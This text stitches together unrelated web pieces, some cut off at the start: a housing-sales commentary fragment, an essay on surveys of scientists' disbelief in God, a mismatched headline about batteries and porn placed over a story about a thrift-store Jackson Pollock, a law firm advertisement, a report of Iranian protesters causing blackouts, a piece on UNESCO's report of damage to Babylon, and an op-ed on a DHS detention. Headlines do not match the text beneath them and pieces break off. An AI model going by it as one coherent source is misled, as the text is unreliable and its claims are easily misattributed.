They annualize the number , they hamhandedly seasonally adjust it , they do whatever they can to accentuate the positive , while ignoring some of the ugly context the data exists in .
Like Foreclosures .
Have a look at this chart — showing total sales , with foreclosures broken out .
>
Foreclosures as a Portion of Existing Home Sales
chart courtesy of M Hanson Advisors
>
The three part harmony that the consensus is singing is out of tune .
While the very worst of housing trouble may be behind us , we are still looking at falling prices and increasing foreclosures .
The Housing getting worse more slowly camp is ignoring the massive Federal subsidies required to get worse more slowly .
As to “ Getting better , ” the data argues persuasively otherwise , and I will make appropriate bets against this viewpoint .
>
Special thanks to Mark Hanson for his assistance with this piece .
Does Science Lead to Atheism ?
July 1 , 2009 11:31 MST
No .
That was the short answer .
The longer answer is that scientists are more likely to disbelieve in God than are nonscientists , and eminent scientists are more apt to be disbelievers than journeyman scientists .
But does science lead them to atheism ?
Possibly , but it seems more likely that freethinkers or skeptics are attracted to science than that science creates atheists .
I studied this question a few years ago , when John Lynch and I prepared an article for the New Encyclopedia of Unbelief .
What follows the horizontal rule is an excerpt from that article .
One of the conclusions we drew was that biologists , anthropologists , and psychologists were more likely to disbelieve in God than physical scientists and engineers .
That conclusion has recently been called into question , and I will discuss the new data after the second horizontal rule .
Measuring Unbelief among Scientists ( 1914 and 1933 ) . … the psychologist James H. Leuba surveyed a large number of US scientists in order to learn their beliefs about God and immortality .
In both polls , disbelievers ( not including doubters or agnostics ) represented a plurality over believers and doubters ( Table 1 ) .
Further , the least likely to be believers were psychologists , followed by sociologists , biologists , and physicists , in that order .
The order stood firm across the years .
Distinguished scientists ( as identified by American Men of Science ) exhibited a substantially greater rate of disbelief than “ lesser ” scientists .
Leuba ’s poll was , however , not without problems .
First , because the U. S. was almost monolithically Christian , Leuba formulated two questions that asked , in essence , whether respondents believed in a particular Christian conception of God .
Asking his questions in that way militated against getting positive responses from , for example , pantheists such as Robert Millikan and Albert Einstein , who associated God with the universe and its laws and thus did not revere , in Leuba ’s words , “ the God of our Churches . ”
Leuba asked respondents whether they believed in “ a God to whom one may pray in the expectation of receiving an answer ” ( a question specifically defined to exclude psychological or subjective consequences of prayer ) , disbelieved in such a God , or had no definite belief .
Second , several questionnaires were returned with remarks intended to justify the respondents ’ refusals to answer the questions .
According to Leuba , most of these were from disbelievers ; hence , he concluded , the percentage of disbelievers may have been understated in his poll .
Scientists are more educated than the general population , and Leuba , a religious humanist , thought that increasing education would decrease rates of belief in God .
To test his hypothesis , he surveyed college students at two unidentified colleges : a high - ranking college that was divided among the major Protestant denominations , and a college that was “ radical ” in its leanings .
In both colleges , the number of believers in both God and immortality decreased with age or academic advancement ( freshman through senior years ) .
Leuba also cites a decrease in belief at one of the colleges between 1914 and 1933 , as well as similar results found at Syracuse University in 1926 .
Leuba , a professor at Bryn Mawr College outside Philadelphia , does not identify the two colleges in his study , but they are probably in the northeast , if not the Philadelphia area .
If the major Protestant denominations means the mainline Protestant churches , then Leuba ’s studies of college students may not be representative , inasmuch as they omit students affiliated with churches not heavily represented in the northeast .
Oddly , Leuba does not mention the Roman Catholic Church .
Measuring Unbelief among Scientists ( the 1990’s ) .
In 1996 and 1998 , Edward J. Larson and Larry Witham replicated Leuba ’s surveys .
For consistency , they did not edit Leuba ’s questions , despite the cultural changes that had occurred in 80 years .
Additionally , American Men and Women of Science no longer highlights eminent scientists , so Larson and Witham derived their “ greater ” scientists from the membership of the National Academy of Sciences ; comparison with Leuba ’s “ greater ” scientists is therefore problematic , because the NAS probably contains substantially more - eminent scientists than the highlighted scientists of the earlier surveys .
Larson and Witham found that nearly 50 percent of the scientists and nearly 75 percent of the “ greater ” scientists surveyed disbelieve in both God and immortality .
An additional 15 - 20 percent are doubters .
It is hard to make much of three numbers , but during the century the percentage of disbelievers increased monotonically in every category , except for a peak in the percent of scientists who disbelieved in 1933 .
Disbelief in immortality more than doubled among scientists in general and nearly tripled among “ greater ” scientists .
It is thus hard to credit Larson and Witham ’s claim that belief among scientists has remained more or less steady for 80 years .
C. Mackenzie Brown has analyzed Leuba ’s data and also suggested that demographics may make comparison between Leuba ’s and Larson and Witham ’s surveys difficult .
For example , more scientists now are women , and women are more likely to be religious than men .
This factor reduces the number of disbelievers in the later surveys and possibly disconfirms Larson and Witham ’s conclusion that scientists ’ religious beliefs have not changed much since 1914 .
Brown has similarly noted that applied scientists are underrepresented among the greater scientists and adds drily that their underrepresentation may be relevant to any discussion of the beliefs of eminent scientists .
In 1998 , Laurence Iannaconne and his colleagues examined existing data gathered between 1972 and 1990 , and tried to assess the prevalence of scientists ’ belief in God .
They found that 19 percent of “ professors / scientists ” have “ no religion ” and 11 to 21 percent “ oppose religion ” ( Table 2 ) .
It is hard to compare these figures with those of Leuba and Larson , but arguably between 27 and 40 percent of professors / scientists may be doubters or disbelievers .
The study broke the data down further by discipline and found a hierarchy similar to that found by Leuba : Social scientists , at 36 percent , were most likely to have no religion , followed by physical scientists and mathematicians ( 27 percent ) and life scientists ( 25 percent ) .
Among the social scientists , sociologists ( 35 percent ) , psychologists ( 48 percent ) , and anthropologists ( 57 percent ) were most likely to have no religion .
According to a 2003 Harris poll , by contrast , 90 percent of all adults [ in the U.S. ] believe in God and 84 percent in survival of the soul after death ; that is , 10 percent disbelieve in God or are doubters , and 16 percent disbelieve in immortality or are doubters .
Interpreting the Data .
Leuba speculated whether scientists become disbelievers or whether independent thinkers willing to confront reigning orthodoxies become scientists .
The greater scientists are presumably on average more - independent thinkers than the lesser ; the fact could account for the increase of disbelief among greater scientists .
That conclusion is supported by a study by Fred Thalheimer , who concluded that religious beliefs are frequently set during high school or college and that nonreligious students may choose more - intellectual or - theoretical endeavors .
Scientists who study biology , psychology , and sociology and anthropology are more likely to disbelieve in God and immortality than physical and applied scientists .
Leuba speculated that physicists and engineers see a creator in the lawfulness of the physical and engineering worlds .
Social and biological scientists may be less likely to see lawfulness in their studies , and Brown asks , further , whether social and biological scientists are perhaps influenced by the suffering that they see and physical scientists do not see .
Thus , the question may be why biological and social scientists are more likely to disbelieve , rather than why physical scientists and engineers are less likely .
Arguably , then , science leads to disbelief , at least among those already inclined to be independent thinkers .
Leuba predicted that increasing scientific knowledge would lead to increasing disbelief .
That prediction is apparently ( at least partly ) correct .
He further predicted that the religions would adapt to the best scientific insights and “ replace their specific method of seeking the welfare of humanity by appeal to , and reliance upon divine Beings , by methods free from a discredited supernaturalism . ”
That prediction , at least so far , is largely incorrect .
Measuring Unbelief among Scientists ( 2004 -2007 ) .
Elaine Ecklund and Christopher Scheitle have recently examined the religious beliefs of scientists as a function of discipline .
They discuss a survey of faculty at 21 elite research universities .
Among the questions they asked were , “ Which one of the following statements comes closest to expressing what you believe about God ? ”
The statements ranged from “ I have no doubts about God ’s existence ” through “ I have some doubts , but I believe in God ” to “ I do not know … and there is no way to find out ” and “ I do not believe in God . ”
To compare their results with Leuba ’s and others , I identified “ I do not believe in God ” with disbelief and identified “ I believe in God sometimes ” and “ I do not know … and there is no way to find out ” with doubt .
The comparison is problematic , if only because Leuba ’s survey concerned a God who potentially answers prayers .
The results are presented in Table 3 .
They support the conclusion that scientists are more apt to be disbelievers than the general public , but they are at odds with the conclusion that the rate of disbelief correlates with discipline .
Ecklund and Scheitle , however , performed a statistical analysis that suggests nevertheless that biologists may be somewhat less inclined toward religion than physicists ; they speculate that the correlation , if it is real , may result from what they call the contentious relationship between evolution and certain religious groups .
Ecklund and Scheitle ’s study is marred somewhat both by its restriction to elite scientists and by its mechanism for choosing those elite scientists .
Not every faculty member at an elite university is an elite scientist , certainly not on a par with members of the National Academy of Sciences .
Nevertheless , they found that the best predictor of their scientists ’ religious practice is the scientists ’ childhood religious practice and conclude , more or less in agreement with Thalheimer , that freethinkers or doubters to some extent self - select when they become scientists .
Thus , science may not lead to disbelief ; rather , disbelievers or skeptics are led to science .
Finally , Ecklund and Scheitle found that younger scientists are more apt to be religious than are older scientists and note without comment that this finding “ could indicate an overall shift in attitudes towards religion among those in the academy . ”
Unbelief outside the US .
I do not know of any studies similar to Leuba ’s outside the United States .
Europe is generally thought to be less religious than the United States , but Andrew Curry , writing in Science , notes some disquieting appearances of creationism in Europe .
He cites a German study , which I have not read , to the effect that students ’ openness to creationism is less a result of religion than of their failure to appreciate or understand science .
Pierre Clément and his colleagues report on a study of the creationist beliefs of teachers , as opposed to professors and practicing scientists .
The cohort of “ teachers ” comprises both practicing teachers and students studying to become teachers .
The study included 19 countries , mostly from Europe , the Levant , and northern Africa .
Approximately one - third of the teachers were biology teachers , and the remainder taught the national language .
Among 14 of those countries , 12.5 % of respondents were agnostic .
In France and Estonia , more than 50 % were agnostic .
The authors give no indication whether the biology teachers were more or less likely to be agnostic than the language teachers .
The study asked questions such as , “ Which of the following four statements do you agree with most ? …
1 . It is certain that the origin of the humankind results from evolutionary processes .
Human origin can be explained by evolutionary processes without considering the hypothesis that God created humankind .
3 . Human origin can be explained by evolutionary processes that are governed by God .
4 . It is certain that God created humankind . ”
A similar set of questions asked about the origin of life , as opposed to the origin of humanity .
The questions were translated into each national language .
Clément and colleagues considered those who ticked question 4 to be ( anti-evolutionist ) creationists , whereas those who ticked question 3 were designated creationist - evolutionists - most probably what in the United States are called theistic evolutionists .
Only about 2 % of the respondents from France , for example , were creationists ; more than 80 % of respondents from Morocco and Algeria were creationists , even among biology teachers .
Creationism was more likely in those who were more religious , either in belief or in observance , irrespective of religion .
Those who said that the theory of evolution contradicted their own beliefs ranged from a few percent among agnostics , through approximately 25 % among Catholics and Protestants , and 40 % among Orthodox , to nearly 75 % among Muslims .
Acceptance of evolution , including theistic evolution , among the entire cohort of teachers , however , increased with years of training , from about 45 % among those with less than 2 years of training through 80 % among those with 4 or more years of training .
These numbers are all rough , because I had to pick most of them off some fairly small graphs .
I suspect that the correlation with religion is partly the result of demographics ; the study did not compare , for example , Catholics and Muslims within a single country , such as France .
The study included five countries in western Europe : France , Germany , the United Kingdom , Portugal , and Italy .
Approximately 10 % of biology teachers in the UK and 15 % in Portugal responded that it was certain that God created life - the response that Clément and his colleagues consider the creationist response .
Nearly 20 % of the language teachers in Italy responded similarly .
On the other hand , roughly 15 % of biology teachers in the UK and Germany , a bit over 20 % in Portugal and Italy , and 35 % in France responded that the origin of life resulted from natural processes ( Table 3 ) .
The language teachers ’ responses to the same question ranged from a low of perhaps 12 % in the UK ( which at 35 % also had a relatively high fraction of theistic evolutionists ) to 52 % in France .
In four of the five countries , the percentage of language teachers who thought that life had resulted from natural processes exceeded the percentage of biology teachers ; I have n’t the foggiest idea why .
Finally , the percentage of both biology and language teachers who ticked natural causes or theistic evolution was least in the Muslim and Orthodox countries , Lebanon , Malta , and Poland .
Conclusion .
Paul Strode and I tried to show that science is not necessarily incompatible with religion , though it certainly falsifies the specific claims of some religions .
Nevertheless , both atheists and creationists ( some of them , anyway ) want to think that science necessarily leads toward atheism or agnosticism .
It is hard to say , but it seems more likely that skeptics or freethinkers , who may be already inclined toward disbelief in God , are more likely to become scientists or , perhaps , science teachers .
The claim that social scientists are less likely to believe than are physical scientists may not stand up to scrutiny .
References .
Anonymous , “ Harris Poll : The Religious and Other Beliefs of Americans 2003 , ” Skeptical Inquirer , July - August , 2003 , p. 5 .
Brown , C. Mackenzie , “ The Conflict between Religion and Science in Light of the Patterns of Religious Beliefs among Scientists , ” Zygon 38 ( 3 ) : 603-632 ( September ) , 2003 .
Clément , Pierre , and Marie - Pierre Quessada , “ Les convictions créationnistes et / ou évolutionnistes d’enseignants de biologie : une étude comparative dans dix - neuf pays , ” Natures Sciences Sociétés 16 , 154-158 , 2008 ; in French .
Clément , Pierre , Marie - Pierre Quessada , Charline Laurent , and Graça Carvalho , “ Science and Religion : Evolutionism and Creationism in Education : A Survey of Teachers ’ Conceptions in 14 Countries , ” XIII IOSTE Symposium , Izmir , Turkey , The Use of Science and Technology Education for Peace and Sustainable Development , 21 - 26 September 2008 .
Curry , Andrew , “ Creationist Beliefs Persist in Europe , ” Science 323 : 1159 , 2009 .
Ecklund , Elaine Howard , and Christopher P. Scheitle , “ Religion among Academic Scientists : Distinctions , Disciplines , and Demographics , ” Social Problems , 54 ( 2 ) : 289-307 , 2007 .
Iannaconne , Laurence , Rodney Stark , and Roger Finke , “ Rationality and the ‘ Religious Mind ’ , ” Economic Inquiry 36( 3 ) : 373-389 , 1998 .
Larson , Edward J. , and Larry Witham , “ Scientists Are Still Keeping the Faith , ” Nature 386 : 435-436 , 1997 .
– , “ Leading Scientists Still Reject God , ” Nature 394 : 313 , 1998 .
– , “ Scientists and Religion in America , ” Scientific American 281( 3 ) : 89-93 ( September ) , 1999 .
Leuba , James H. , Belief in God and Immortality , Boston : Sherman , French , 1916 .
– , “ Religious Beliefs of American Scientists , ” Harper ’s Monthly Magazine , August : 291-300 1934 .
Thalheimer , Fred , “ Religiosity and Secularization in the Academic Professions , ” Sociology of Education 46 : 183-202 ( spring ) , 1973 .
Young , Matt , and John Lynch , “ Unbelief among Scientists , ” New Encyclopedia of Unbelief , Amherst , N.Y. : Prometheus , 2007 , pp. 687-690 .
Young , Matt , and Paul Strode , Why Evolution Works ( and Creationism Fails ) , New Brunswick , N.J. : Rutgers , 2009 , chap .
18 .
You Need A Duracell To Watch Porn
If you 're not an art connoisseur , it looks a lot like a bunch of squiggly lines on a page .
But to an expert , it 's a stunning find - an original Jackson Pollock , an American painter and an artist considered a master of abstract expressionism .
How this painting came to be on display and up for sale in a local Toronto gallery is the stuff of legend .
You may remember the unbelievable story surrounding a woman named Teri Horton , a retired truck driver who loved to frequent thrift shops around North America .
When she entered one of them in California in the 1990s , she spotted a picture lying unused in a corner , a piece of artwork that no one seemed to want .
She hated it but thought it was funny .
And she was going to buy it for her depressed friend .
And she brought it to the counter and the lady said it was $ 8 and Teri said she 's willing to pay $ 5 , she does n't love her friend that much .
They were planning on drinking some beers and throwing darts at it .
But a friend of hers was dating an art teacher and he looked at it and said ' you very well may have a Jackson Pollock on your hands . '
And she came back with the statement ' Who the F is Jackson Pollock ? '
And it all began from there .
That statement became the name of a 2006 documentary featuring her story , including her struggles to prove her five buck painting was really the masterpiece many claimed it was .
It was finally authenticated and now there 's no doubt about its value .
The painting has since been assessed as being worth a stunning $ 50 million , surely the greatest flea market bargain in history .
SPIEGEL Interview with Manuel Zelaya ' We Will Not be Brought to Our Knees '
In a SPIEGEL interview , ousted President Manuel Zelaya , 56 , discusses the coup in his native Honduras , the lack of intervention from Washington , his political ties to Venezuelan President Hugo Chavez and his hopes to unseat the regime by peaceful means .
Aiken & Jacobsen , Attorneys at Law
When you have been injured in an accident , the medical bills can pile up , your work and career can suffer and personal challenges can cause significant distress .
It seems that getting your life back on track is nearly impossible .
How can you ensure that you receive the compensation you need to move forward again ?
Turn to a personal injury law firm that is dedicated solely to the plight of accident victims .
— Aiken & Jacobsen .
Put Our Legal Experience To Work For You
At Aiken & Jacobsen , we practice exclusively in personal injury law and have a proven record of results in accident injury claims .
Our attorneys have more than 50 years of combined legal experience and have represented thousands of accident victims .
No matter how difficult or complex your case may be , we are here to seek a resolution that meets your goals and needs .
Your well - being and future is our number one priority .
We are committed to protecting your rights .
To schedule a free consultation with an experienced personal injury lawyer at Aiken & Jacobsen , contact our law office in Sacramento , California .
You can also call ( 916 ) 290-9378 .
We have represented clients throughout California who have sustained a wide range of serious injuries , including back and neck injuries , broken bones , paralysis , loss of limb , traumatic brain injuries and other serious injuries .
These types of injuries can take months , even years to recover from and involve rehabilitation , physical therapy and at - home care .
Some unfortunately are permanent , and accident victims have to live with their injuries for the rest of their lives .
We have also advocated on behalf of many family members in wrongful death claims .
Our personal injury attorneys represent clients throughout the Sacramento metro in a wide range of personal injury claims , including serious auto accidents , alcohol - related crashes , truck driver negligence claims , premises liability including slip - and - fall accidents , work - related injuries and construction site accidents , as well as dangerous products .
Our team of dedicated and experienced lawyers will work hard to seeking full and fair compensation on your behalf .
We Are Committed To Your Recovery
We are committed to helping people like you get their lives back on track after they have sustained serious injuries .
We want to help you move forward with your life in the most positive and constructive way .
After an accident , your life has screeched to a halt .
Your ability to work may have been hampered .
Your health still on the mend .
Understandably , you are feeling overwhelmed both physically and emotionally .
We take pride in going the extra mile for our clients .
If you need help finding a doctor , chiropractor , body shop , physical therapist or counselor , we are pleased to provide helpful guidance .
We even assist clients with property damage resulting from auto accidents .
Making a positive difference in your life is our focus .
Our Team Of Skilled Personal Injury Attorneys
With extensive negotiation and trial skills , our team is compassionate to each and every one of our clients ' needs .
Our law firm 's size allows us to provide truly individualized and catered attention , unlike big firms with a personal injury mill mentality .
When you come to our law firm located in Sacramento , California , you will feel an immediate sense of care and dedication .
We take the time to get to know you , your family and what your specific goals are for your injury case .
Once we have heard your story , we will immediately take action in gathering additional facts and evidence to support your claim .
The sooner you reach out to our personal injury lawyers , the sooner we can begin to take action on your behalf .
Seeking Maximum Compensation For Accident Victims
We vigorously pursue maximum compensation on behalf of accident victims .
Damages in injury claims can include past and future medical expenses , pain and suffering , lost wages , loss of earning capacity , emotional damages and other forms of available relief .
As a client of our firm , you will have a strong advocate on your side .
Susan Greenwood goes on a taster session at the Manchester Velodrome to see what it 's like to cycle around a 1:1 hill at 25 mph
Iranian twitterers are claiming victory in a coordinated series of blackouts during Ahmadinejad 's televised speech yesterday :
The protesters had earlier pre-arranged a call for Iranians to plug in heavy power load household devices such as dryers , irons and toasters at 9:45 pm local time , as Ahmadinejad 's speech began .
Online Twitter feeds claimed blackouts were achieved in East Tehran , Sari , Tabriz , Isfehan , Rodehen , Saghez , Lavasan , Ahvaz , Khoramshahr , Dezfol , Jahrom , Khomini Shahr , Shahin Shar , Folad Shahr , Kashan and some of Rasht .
Some sample tweets :
Iron Tactic tonight : Call for Black Out During Ahmadinejad Live at TV , Tehran Time 21.30 ...
Yes It Worked !
Ghazvin went in Black Out , People Chanting " Death to Dictator " on the roofs in many cities ...
We want to hear what you think about this article .
Submit a letter to the editor or write to letters@theatlantic.com .
UNESCO Report on Babylon
US occupation caused “ major damage ” to historic site in Iraq
By Sandy English
11 August 2009
UNESCO , the United Nations cultural organization , has issued a report outlining the extensive damage caused by US occupation forces in Iraq to the archeological site of ancient Babylon , about 100 Km ( 60 miles ) south of Baghdad .
The report was based on examinations of the site by prominent specialists , including John Curtis , John Russell and Elizabeth Stone .
It charges American and Polish forces with carrying out “ a grave encroachment on this internationally known archaeological site . ”
The report continues , “ During their presence in Babylon , the MNF - I [ Multi- National Forces ] and contractors employed by them , mainly KBR , directly caused major damage to the city by digging , cutting , scraping , and leveling .
Key structures that were damaged include the Ishtar Gate and the Processional Way . ”
The site of Babylon is of major historical and scientific importance .
Babylon was a leading city of ancient Mesopotamia in what is now modern Iraq .
It is one of the oldest centers of civilization in the world , and the origin of many social and technological discoveries that form the basis of modern culture .
Babylon is first mentioned in baked clay tablets from the area over 4,000 years ago .
The city is best known for two of its rulers : Hammurabi ( 1792 -1750 BC ) , who enacted one of the world ’s first codes of law ; and Nebuchadnezzar ( 604 - 562 BC ) , who built the Hanging Gardens of Babylon , one of the Seven Wonders of the ancient world .
Babylon was conquered by Alexander the Great , who died there in 323 BC .
The city figures prominently in the Old Testament .
After the Islamic period , the location of the city was forgotten .
Babylon was first scientifically excavated by the German archaeologist Robert Koldewey in 1899 , and many important finds were made in the subsequent colonial period , including that of the splendid Ishtar Gate .
A reconstruction of the gate , with materials supplied by Koldewey , now stands in Berlin ’s Pergamon Museum .
Archaeologists from the German Archaeological Institute made significant finds between 1962 and 1973 .
Excavations have been conducted since 1977 under the auspices of the Iraqi State Board of Antiquities and Heritage ( SBAH ) .
The Baathist regime of Saddam Hussein initiated the Babylon Archaeological Restoration Project .
The aim of the regime was to reinforce nationalist sentiment , and , alongside serious study of the site , there was the irresponsible addition of new structures .
A palace for Hussein was built there , in addition to parking lots , a restaurant , artificial mounds and canals .
In addition , according to the UNESCO report , faulty restorations of ancient buildings were made .
Shortly after the American invasion , the Nebuchadnezzar and Hammurabi museums on the site were looted .
Only plaster replicas of ancient objects were stolen .
Much more serious was the burning of the Babylon Library and Archive , which contained valuable archaeological records .
In April 2003 , the United Sates military , and eventually Polish troops , occupied the site and later made a permanent installation called Camp Alpha that remained there until December 2004 , when the site was handed back to SBAH .
The US military cordoned off the area with barriers and barbed wire and contracted the notorious subsidiary of Halliburton , KBR , to do much of its construction work .
Coalition forces or KBR dug eight trenches — including one over 160 meters long — all over the site of the ancient city .
The soil that was removed was either piled up on the sides of the trenches or put into barricade - like HESCO containers .
UNESCO reports that in case after case , the soil removed contained “ fragments of ancient baked brick and pottery . ”
Even small ceramic fragments have scientific importance since they can help archeologists date the layers or reconstruct the layout of the city .
When they are moved from their context , this becomes nearly impossible .
In some cases , the trenches themselves cut into ancient surfaces .
In order to build roads or erect earthen barriers , the military occupation forces dug pits on the ancient site and cut into mounds or tells , which have been formed by thousands of years of accumulation of human debris .
One description in the report reads , “ A section through the cut shows a deposit with various archaeological fragments . ”
Some cuts removed entire sides of mounds or extended into ancient walls of baked brick .
Occupation forces scraped and leveled a number of archaeological areas and tells .
Some were subsequently covered with sand and gravel to make parking lots for military equipment .
The report notes , “ This operation covered broad areas of Babylon and entailed the use of heavy equipment to compact the soil , which may have destroyed any antiquities beneath the surface .
The effects of chemical treatment on the archaeological sub - surface layers are not yet known . ”
Banks of earth were constructed with debris from the trenches , which , according to the UNESCO report , contained bricks with inscriptions from the Nebuchadnezzar period .
The occupation forces also drove steel stakes into ancient walls , which also included fragments with inscriptions from the time of Nebuchadnezzar .
The report outlines the direct damage inflicted by occupation forces on ancient monuments that constitute some of the most important artistic accomplishments of ancient Mesopotamian cultures , such as the remnants of the Ishtar Gate .
“ The damage to the gate includes smashed bricks on nine of the bodies of animals adorning the gate .
These animals depict the legendary dragon - snake , the symbol of Marduk , the god of the city of Babylon . ”
There was also egregious damage to the Processional Way of the city .
The report notes the marks of heavy vehicles that broke the ancient paving of the street .
In addition , “ Three rows of 2 - ton blocks were placed in the middle of the Processional Way on top of the paving , ” which were removed by helicopter in 2004 .
The vibrations of heavy equipment in the area damaged other archaeological structures .
The roof of the Ninmakh Temple , which had a busy helicopter pad constructed next to it , collapsed .
To compound the damage , the occupation forces refused to allow SBAH personnel onto the site to conduct maintenance and restoration of the ancient buildings .
Occupation forces also damaged the modern buildings of the site , including the offices the Museums and the Study Center , “ rendering them shells devoid of doors , windows , and electrical fixtures , ” according to the report .
Since the withdrawal of foreign military forces from the area , the site has continued to be disrupted by the infighting within the US - installed Iraqi government .
The local governor of the province is currently building a large garden on the site and has flattened an area of the site with a bulldozer .
He and SBAH have disputed the rights to access the area .
The UNESCO report makes a number of recommendations , including an investigation of the long - term implications of the damage to the site .
It also calls for making the archaeological area of Babylon a World Heritage Site , the most prestigious and best - funded status that the organization can grant to a historic site .
While necessary , these suggestions take no account of the criminal nature of the destruction of the site that took place under the auspices of the American occupation .
In spite of repeated warnings by archaeologists before and during the war , the American - led occupation forces acted with deliberate disregard for the cultural heritage not only of the Iraq people , but indeed , of the entire planet .
The Bush administration and the American political establishment , including the Democratic Party , which facilitated the invasion of Iraq , are responsible for the lootings and burnings of libraries , archives and museums all over Iraq after April 2003 — and the continued looting of archaeological sites to feed the illegal market in antiquities .
The UNESCO report , by the very nature of the organization issuing it , cannot draw the logical conclusion that flows from its findings : that the damage to Babylon is part of a larger war crime , for which those responsible should be criminally investigated and tried .
But the details of the report speak for themselves : the American presence led to the vandalism of one of the oldest cities in the world .
That this crime is largely overlooked is only because it pales in comparison to the deaths of over a million Iraqis and the continued displacement and poverty of millions more since the 2003 American invasion .
The damage to Iraq ’s archaeological sites , libraries , and museums and to the educational system remains , however , a crucial part of the sociocide — the destruction of a whole society — carried out in Washington ’s attempt to seize control of its natural resources and strategic location .
Arriving at JFK from Dubai recently , I was stopped at customs by an officer from the Department of Homeland Security and directed to a drab backroom filled with Arabs , South Asians and Africans .
I was n’t surprised , really , having just spent six months working and traveling in the Islamic world -- Turkey , Lebanon , Egypt and Pakistan .
If ever there were a DHS red - flag candidate ,
I was it , and I assumed this was just protocol .
Four of those months were in Pakistan , and I had just spent a week with a journalist friend going to different madrasas , including one Islamic school visited by one of the bombers in the July 2005 attacks in London .
Possibly I caught their attention by poking around the Karachi Marriot ’s parking lot , across from the U.S. consulate , where a suicide bomber ’s attack had killed a U.S. diplomat just two months before .
How about the hundreds of phone calls I made from Pakistan to friends and family back home that inevitably mentioned the Taliban ’s resurgence and criticized President Bush .
Was I wiretapped ?
Certainly Homeland Security , whose stated mission is to “ lead the unified national effort to secure America ... prevent and deter terrorist attacks and protect against and respond to threats and hazards to the nation , ” had detained me for such a reason .
Advertisement
Or maybe officers had questions about the Jamaat - ud - Dawa rally I ’d witnessed in Kashmir .
The group was protesting against the United States because it recently had been added to the State Department ’s list of groups designated as terrorist organizations .
Then there was Lebanon , where I ’d traveled deep into the Hezbollah - held south .
If only .
No , these frontline warriors in the global war on terrorism at Homeland Security had far more pressing issues to question me about .
“ Why did you infringe on the Boston Celtics ’ copyright in Boston in 2003 ? ” asked my case officer , Malik -- ironically a Pakistani -- from behind his high desk .
Uh , because I used to sell T - shirts outside sporting events , I said , wondering what this had to do with national security .
“ You ’ve got a long record , ” he said .
Sure , for peddling “ Yankees Suck ” T - shirts -- sans permit , which is n’t a crime but a code violation -- not for promoting “ Bin Laden Rulz ! ” DVDs or the “ Idiot ’s Guide to Suicide Bombing . ”
Advertisement
“ You know , we could have you sent up to Boston for the unresolved T - shirt infractions , ” Malik said .
“ But what we ’re holding you for is an NYPD bench warrant from 2004 .
You were in a fight with a parking attendant , found not guilty and then missed a court date . ”
All true .
But how and why does Homeland Security share the NYPD ’s jurisdiction in cases unrelated to counter - terrorism ?
A fight over a parking space hardly counts as terrorism .
“ We ’re calling NYPD to come to pick you up , ” Malik told me , without asking a single question about Pakistan , terrorism , Islam or madrasas .
So I sat and waited .
Four DHS officers working two cases -- a Senegalese guy who was caught with $ 100,000 in a suitcase and mine -- could n’t even get the NYPD on the phone .
A debate then broke out among Malik , his co-worker and their boss about how to call the NYPD .
Six hours later , the DHS still had n’t gotten word from the NYPD .
A shift change was coming up , and officers are n’t allowed to leave until finishing all their cases .
Instead of protecting the homeland from such a dangerous T - shirt - selling , off - road - rager like me , Malik set me free , so he could get home in time to watch Mike and the Mad Dog ( “ Eh , is Pedro pitchin ’ tonight ? ” I overheard an officer ask ) .
As he closed out my paperwork , Malik asked , “ So , ah , Mr. LeMoine , why did you miss that court date anyway ? ”
Advertisement
“ I was in Iraq . ”
“ Doing what ?
Like a contractor , soldier ? ”
“ No .
I had volunteered to run a humanitarian program for the Coalition Provisional Authority but left when they started killing Westerners . ”
“ Damn terrorists .
Take care of that warrant .
And welcome home . ”
Advertisement
Welcome home indeed .
Homeland Security , the $ 40 - billion - a - year agency set up to combat terrorism after 9/11 , has been given universal jurisdiction and can hold anyone on Earth for crimes unrelated to national security -- even me for a court date I missed while I was in Iraq helping America deter terror -- without asking what I had been doing in Pakistan among Islamic extremists the agency is designated to stop .
Instead , some of its actions are erasing the lines of jurisdiction between local police and the federal state , scarily bringing the words “ police ” and “ state ” closer together .
As long as we allow Homeland Security to act like a Keystone Stasi , terrorism will continue to win in destroying our freedom .
